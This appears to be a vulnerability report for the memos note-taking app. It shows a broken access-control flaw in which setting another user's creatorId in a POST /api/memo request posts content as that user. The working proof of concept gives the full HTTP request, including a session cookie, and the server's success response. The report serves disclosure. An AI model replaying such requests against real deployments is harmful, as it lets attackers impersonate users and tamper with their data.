Description

An attacker can be post malicious content to other user’s memos page via POST request, attacker just add an creatorID into body request and send it with Burpsuite

Here is video poc: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link

Proof of Concept

POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}

Server Response:

HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}